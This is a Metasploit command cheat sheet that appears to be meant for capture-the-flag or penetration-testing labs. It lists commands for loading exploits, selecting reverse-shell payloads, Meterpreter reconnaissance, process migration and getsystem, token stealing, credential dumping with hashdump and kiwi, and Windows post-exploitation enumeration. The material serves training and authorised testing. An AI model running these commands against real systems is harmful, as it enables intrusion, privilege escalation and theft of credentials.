# Install exploit manuallycp -v <EXPLOIT> /usr/share/metasploit-framework/modules/exploits/
# OR from exploit-dbpushd /usr/share/metasploit-framework/modules/exploits/
searchsploit -m <EDB-ID>
# in MSFreload
reload_all
### Search# <type>/<os>/<service>/<name># Search for port and name, showing exploits onlysearch type:exploit platform: port:<PORT> name:<NAME>
# grepgrep meterpreter grep reverse_tcp show payloads
# Set all LHOST to tunnel IPsetg LHOST tun0
📊 Meterpreter Survey
sysinfo
getuid
getpid
ipconfig
ps
# Linux flag searchsearch -d / -f flag.txt
search -d / -f user.txt
search -d / -f root.txt
# Windows flag searchsearch -d C:\\ -f flag.txt
search -d C:\\ -f user.txt
search -d C:\\ -f root.txt
# REMEMBER: for Windows, quoting and double slashes cat "C:\\Programs and Files (x86)\\"# Migrateps -s | grep svchost
migrate <PID>
getsystem
getprivs
# List security tokens of user and grouplist_tokens -u
list_tokens -g
impersonate_token <DOMAIN_NAMEUSERNAME>
steal_token <PID>
drop_token
# Dumps credshashdump # CrackStationlsa_dump_sam
lsa_dump_secrets
# Better dump credsload kiwi
creds_all
# === WINDOWS ===run winenum
run post/windows/gather/checkvm
run post/windows/gather/enum_applications
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_shares
# --- Privilege Escalation & Credential Gathering ---run post/windows/gather/smart_hashdump
run post/multi/recon/local_exploit_suggester
🗄️ DB for Targets
# Check database status from within msfconsoledb_status
# Database Backend Commandsdb_nmap <NMAP_OPTS> <TARGET>
db_connect
db_disconnect
db_export -f xml metasploit_backup.xml
db_import <SCAN_FILE_XML>
db_rebuild_cache
db_remove
db_save
# Manage workspacesworkspace
workspace -a <WORKSPACE>
workspace -d <WORKSPACE>
workspace <WORKSPACE>
hosts
loot
notes
services
vulns
creds
# Using database hosts for a modulehosts -R # set RHOSTS from hostsservices -S <SEARCH>